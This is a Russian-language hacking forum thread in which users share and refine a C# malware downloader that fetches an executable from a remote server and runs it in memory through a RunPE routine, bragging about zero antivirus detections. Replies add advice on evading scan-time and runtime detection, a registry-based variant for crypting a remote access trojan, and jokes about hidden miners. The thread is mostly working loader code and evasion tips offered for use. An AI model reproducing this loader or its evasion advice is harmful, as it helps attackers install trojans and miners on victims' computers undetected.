Детекты : https://www.virustotal.com/gui/file...19e2660c900821e526b7599b4dcbc587fae/detection (Залил на Вт так как тестовый и напсаный за 15 минут ) Сам пиздец как такое сделать . Суете RunPe любой даже заезжанный .. Скачиваете через дефолтные библы от студийки У меня получилось примерно вот так WebClient webClient = new WebClient(); webClient.DownloadFile("http://x.x.x.x/test.exe", Environment.GetEnvironmentVariable("Temp") + "\\x.x.x.x.exe"); Thread.Sleep(8000); byte[] payload = File.ReadAllBytes(Environment.GetEnvironmentVariable("Temp") +"\\test.exe"); string filevar = "x.x.x.x.x"; RunMax.Run(payload, filevar); }р Все у вас готовы Downloader(Лоадер) с 0 детектами . ПОЖАЛУЙСТА ЕСЛИ ВЫ БУДЕТЕ ИСПОЛЬЗОВАТЬ СБОРКУ ОДНИМ ФАЙЛОМ(DONTET,CODEBOOM,MSBUILD) ЖДИТЕ ДЕТЕКТОВ . ЛИБО СУЙТЕ НОРМ МАНИФЕСТ Так же я понимаю , что это настоящий быдлокодинг , без вызова какой то хуйни. НО ЭТО ПРОСТО ПРИМЕР НАПИСАНЫЙ ЗА 15 МИНУТ
Где ссылка на пример? Нахуя нам ссылка на вирус тотал без доказательств что это детект этой программы
@CoderVir, сделал бы загрузку байтов и запуск в памяти средствами winapi был бы и лучше рантайм детект и интереснее
TheWall_inactive2650523, WriteProcessMemory детектится на рантайме. Брал сабку на динчике. Скантайм фуд, море джанкода, трешгена, нотки полиморфизма и наследования, а по итогу рантайм из под шарпа хуйня, тк вызовы kernel32 и ntdll сами по себе чекаются вендерами, за счёт чего и детектится. Можно реализовать через делегаты, но оно всё равно ровным счётом ничего не изменит. Даже если ты сделаешь компиляцию кода на лету в рантайме, оно удержит онли скантайм.
TheWall_inactive2650523, это если ты ебошиш дефолт динамику . Даже чекни на легальной программе , тот же самый алгоритм дейкстра через codeboom прогани он тебе даст от касперского детект. Если даже через публикацию dotnet сделаешь , будут детекты . Вот что становиться если юзать онли все в компиле . Мы с CodeVir смоковали эту тему вот что в выходе , 1 детект из за того что у меня компилятор стоял в свойствах unsafe По названиям можешь глянуть . И по времени . Что это все тоже самое .
дам вам идею для ратника чтобы криптануть, создаете лоадер RunPe который будет брать код из реестра и создаем ****пер который по пути реестра будет сохранять код то есть массив байтов ****пер будет палиться за то лоадер нет, понимаю примитивно но способ довольно таки рабочий. --- Сообщение объединено с предыдущим 9 окт 2021 так на много легче и без загрузки в темп) using (WebClient wc = new WebClient()) { try { byte[] buffer = wc.DownloadData("http://YourSite/payload.exe"); RunMax.Run(buffer, "x.x.x.x"); } catch { } } C# using (WebClient wc = new WebClient()) { try { byte[] buffer = wc.DownloadData("http://YourSite/payload.exe"); RunMax.Run(buffer, "x.x.x.x"); } catch { } }
Lytik_inactive4477619, самое страшное для юзера в ран пе это системные прерывания хахаха, всегда про них шутил (скрытый майнер)
Dead__Artis, самое страшное для юза если суешь в regAsm и в процах можно просмотреть . Процесс приостановлен xD
Ебанулся, мне этот же код пол года назад выдавал 2-3 детекта , учитывая файлообменник( 2 детекта за счёт кода, если юзать гд с запароленым архивом )
Yotic, хуй знает хуй знает 2 день на вт лежит поебать. Как то похуй . Могу скинуть еxe запустишь тестанешь по рантайму X)